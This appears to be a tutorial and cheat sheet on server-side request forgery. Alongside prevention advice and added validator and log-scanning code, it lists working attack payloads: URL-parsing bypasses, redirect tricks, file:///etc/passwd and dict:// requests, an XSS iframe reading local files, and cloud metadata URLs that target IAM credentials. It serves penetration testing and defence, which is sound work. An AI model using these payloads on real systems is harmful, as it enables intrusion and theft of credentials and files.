Server-Side Request Forgery, SSRF
Server-Side Request Forgery, SSRF for short, is a vulnerability class in which the server is induced to make a request that is under the attacker's control. SSRF is a web security vulnerability that allows an attacker to make the server-side application send HTTP requests to an arbitrary domain of the attacker's choosing.
In typical SSRF examples, the attacker might cause the server to make a connection back to itself, to other web-based services within the organisation's infrastructure, or to external third-party systems.
What are the types of SSRF?
· Blind SSRF — occurs when you never get any information about the target service back from the initial request
· Semi Blind SSRF
· Non-Blind SSRF
What is the impact of SSRF attacks?
A successful SSRF attack can often result in:
· Unauthorised actions or access to data within the organisation, either in the vulnerable application itself or on other back-end systems that the application can communicate with.
· Scanning of local or external networks.
· Reading files from the server and other internal resources.
· Escalation from SSRF to reflected XSS.
· Fetching the cloud metadata of the servers.
Preventing Server Side Request Forgery (SSRF)
To prevent SSRF vulnerabilities in web applications, it is strongly advised to use an allow-list (whitelist) of the domains and protocols from which the web server may fetch remote resources.
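An allow-list check of the kind described above, as an added example that is not code from the original post: scheme, host and port are checked against an allow-list, the resolved address is tested against loopback, link-local and the cloud metadata addresses listed further down this page, and redirects are followed hop by hop so that every hop is validated. The allow-listed host names and the injectable resolve and get callables are assumptions made for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}   # assumed allow-list
# Cloud metadata addresses named on this page. 192.0.0.192 counts as "global"
# for Python's ipaddress module, so the is_global test alone would let it through.
METADATA_IPS = {"169.254.169.254", "100.100.100.200", "192.0.0.192"}

def validate_fetch_url(url, resolve=socket.gethostbyname):
    """Return (True, resolved_ip) or (False, reason). `resolve` is injectable so
    the check can be exercised offline."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:           # file://, dict://, gopher://
        return False, "scheme not allowed: %r" % parts.scheme
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"                       # http://good:80+&@10.0.0.1:22/
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return False, "host not in allow-list: %r" % host
    try:
        if parts.port not in (None, 80, 443):
            return False, "port not allowed"
        ip = ipaddress.ip_address(resolve(host))
    except (OSError, ValueError) as exc:
        return False, "malformed URL or resolution failed: %s" % exc
    # Decide on the resolved address, not the name: a DNS record that points an
    # allow-listed name at 127.0.0.1 or 169.254.169.254 must still be refused.
    if str(ip) in METADATA_IPS or not ip.is_global:
        return False, "resolves to internal address %s" % ip
    return True, str(ip)

def fetch_checked(url, get, resolve=socket.gethostbyname, max_hops=3):
    """Follow redirects by hand so that every hop is validated; automatic redirect
    following is what the 'whitelisted host that redirects' bypass relies on.
    `get(url)` is an injected HTTP client returning (status, location, body)."""
    for _ in range(max_hops):
        ok, detail = validate_fetch_url(url, resolve)
        if not ok:
            raise ValueError("refused %s: %s" % (url, detail))
        status, location, body = get(url)
        if status not in (301, 302, 303, 307, 308):
            return body
        url = location
    raise ValueError("too many redirects")
```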
When should you test for SSRF?
1. If you find an open redirect, try escalating it to SSRF.
2. Grep for parameters that may be vulnerable to SSRF.
3. SSRF is more common in APIs, so crawl the whole web app with the Burp proxy turned on and search for keywords such as ?url=, ?uri=, ?req=.
4. Sign up with an email address on a domain you control, such as attacker.collaborator.net. If you receive an HTTP request in Collaborator, it is SSRF. But if there is no impact, don't report it; DNS and SMTP requests alone don't matter.
5. Try to find blind SSRF in hidden parameters.
6. Try blind SSRF via the Referer header.
How can an SSRF attack be performed against a target application?
Some of the payloads for SSRF:
URL-based bypasses:
http://google.com:80+&@127.88.23.245:22/#+@google.com:80/
http://127.88.23.245:22/+&@google.com:80#+@google.com:80/
http://google.com:80+&@google.com:80#+@127.88.23.245:22/
http://127.88.23.245:22/?@google.com:80/
Bypassing using a redirect
1. Create a page on a whitelisted host that redirects requests to the target URL (e.g. 192.168.0.1).
2. Launch the SSRF pointing to http://vulnerable.com/index.php?url=http://YOUR_SERVER_IP; the server will fetch YOUR_SERVER_IP, which will redirect it to 192.168.0.1.
Bypassing using type=url
Change "type=file" to "type=url".
Paste the URL in the text field and hit enter.
With this change the form fetches the image from any URL the user supplies, which triggers an SSRF.
SSRF exploiting PDF file
<link rel=attachment href="file:///root/secret.txt">
The content of the file will be integrated inside the PDF as an image or text.
SSRF from XSS
<img src="echopwn" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
SSRF from curl
curl http://targetwebsite.com:4567/\?url\=http://10.0.0.2/
It will return something like:
RESPONSE: <html><head><title>Internal admin panel</title></head>…</html>
SSRF from Referer header
GET / HTTP/1.1
Host: targetwebsite.com
User-Agent: Firefox
Referer: https://your_collaborator_instance.com
SSRF from File-upload — redirect test for various cases
Status codes: 300, 301, 302, 303, 305, 307, 308
Filetypes: jpg, json, csv, xml, pdf
JPG 301 response without and with a valid response body:
https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-.i.jpg
https://ssrf.localdomain.pw/img-without-body-md/301-http-.i.jpg
https://ssrf.localdomain.pw/img-with-body/301-http-169.254.169.254:80-.i.jpg
https://ssrf.localdomain.pw/img-with-body-md/301-http-.i.jpg
JSON 301 response without and with a valid response body:
https://ssrf.localdomain.pw/json-without-body/301-http-169.254.169.254:80-.j.json
https://ssrf.localdomain.pw/json-without-body-md/301-http-.j.json
https://ssrf.localdomain.pw/json-with-body/301-http-169.254.169.254:80-.j.json
https://ssrf.localdomain.pw/json-with-body-md/301-http-.j.json
CSV 301 response without and with a valid response body:
https://ssrf.localdomain.pw/csv-without-body/301-http-169.254.169.254:80-.c.csv
https://ssrf.localdomain.pw/csv-without-body-md/301-http-.c.csv
https://ssrf.localdomain.pw/csv-with-body/301-http-169.254.169.254:80-.c.csv
https://ssrf.localdomain.pw/csv-with-body-md/301-http-.c.csv
XML 301 response without and with a valid response body:
https://ssrf.localdomain.pw/xml-without-body/301-http-169.254.169.254:80-.x.xml
https://ssrf.localdomain.pw/xml-without-body-md/301-http-.x.xml
https://ssrf.localdomain.pw/xml-with-body/301-http-169.254.169.254:80-.x.xml
https://ssrf.localdomain.pw/xml-with-body-md/301-http-.x.xml
PDF 301 response without and with a valid response body:
https://ssrf.localdomain.pw/pdf-without-body/301-http-169.254.169.254:80-.p.pdf
https://ssrf.localdomain.pw/pdf-without-body-md/301-http-.p.pdf
https://ssrf.localdomain.pw/pdf-with-body/301-http-169.254.169.254:80-.p.pdf
https://ssrf.localdomain.pw/pdf-with-body-md/301-http-.p.pdf
AWS:
1. On AWS the instance metadata service is at 169.254.169.254, so don't use 127.0.0.1 there!
2. If you find an SSRF vulnerability in an application running on EC2, try requesting:
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE
http://169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
SSRF URL for Oracle Cloud
http://192.0.0.192/latest/user-data/
SSRF URL for Alibaba
http://100.100.100.200/latest/meta-data/
A few more random payloads that might help in finding SSRF vulnerabilities.
Use the payloads below as the request line:
GET /?url=http://google.com/ HTTP/1.1
Host: example.com
GET /?url=http://localhost/server-status HTTP/1.1
GET /?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
GET /?url=dict://localhost:11211/stat
GET /?url=file:///etc/passwd
Scheme keywords to try: file:///, dict://, ftp://, gopher://
http://example.com/ssrf.php?url=file:///etc/passwd
http://example.com/ssrf.php?url=file:///C:/Windows/win.ini
{"userId": "1", "url": "http://127.0.1:513/"}
{"userId": "1", "url": "http://127.0.0.1:513/"}
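The defender's counterpart to the payloads above, as an added example that is not part of the original post: it scans logged request lines for the ?url=, ?uri= and ?req= parameters this page names and flags values that use file://, dict://, gopher:// or ftp://, point at localhost or the cloud metadata addresses listed above, or carry an internal IP literal, including the shorthand 127.0.1 form shown above. The request lines are constructed from the request shapes on this page.

```python
import ipaddress
import socket
from urllib.parse import parse_qs, unquote, urlsplit

SSRF_PARAMS = {"url", "uri", "req"}          # parameter names this page lists
DANGEROUS_SCHEMES = {"file", "dict", "gopher", "ftp"}
# localhost plus the cloud metadata addresses named on this page.
INTERNAL_HOSTS = {"localhost", "169.254.169.254", "100.100.100.200", "192.0.0.192"}

def to_ipv4(host):
    # inet_aton accepts shorthand such as 127.0.1 or 127.1 and normalises it,
    # which is exactly what a string comparison against "127.0.0.1" misses.
    try:
        return ipaddress.ip_address(socket.inet_ntoa(socket.inet_aton(host)))
    except OSError:
        return None

def classify_target(value):
    """Label one parameter value as a finding, or return None if it looks benign."""
    parts = urlsplit(unquote(value))      # second decode catches double-encoded probes
    scheme, host = parts.scheme.lower(), (parts.hostname or "").lower()
    if scheme in DANGEROUS_SCHEMES:
        return "scheme:" + scheme
    if host in INTERNAL_HOSTS:
        return "internal-host:" + host
    ip = to_ipv4(host)
    if ip is not None and not ip.is_global:
        return "internal-ip:" + str(ip)
    return None

def scan_requests(lines):
    """Return (param, value, label) for every request line that looks like a probe."""
    findings = []
    for line in lines:
        fields = line.split()             # "METHOD /path?query HTTP/1.1"
        if len(fields) < 2:
            continue
        for name, values in parse_qs(urlsplit(fields[1]).query).items():
            if name.lower() in SSRF_PARAMS:
                for value in values:
                    label = classify_target(value)
                    if label:
                        findings.append((name, value, label))
    return findings

SAMPLE_REQUESTS = [  # constructed from the request shapes shown on this page
    "GET /?url=http://google.com/ HTTP/1.1",
    "GET /?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1",
    "GET /?url=dict://localhost:11211/stat HTTP/1.1",
    "GET /ssrf.php?url=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1",
    "GET /?url=http://127.0.1:513/ HTTP/1.1",
]
```

Run scan_requests(SAMPLE_REQUESTS) to see the four probes flagged and the plain google.com fetch left alone.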
Some of the tools that can be used for SSRF:
· SSRFmap — https://github.com/swisskyrepo/SSRFmap
· Gopherus — https://github.com/tarunkant/Gopherus
· See-SURF — https://github.com/In3tinct/See-SURF
· SSRF Sheriff — https://github.com/teknogeek/ssrf-sheriff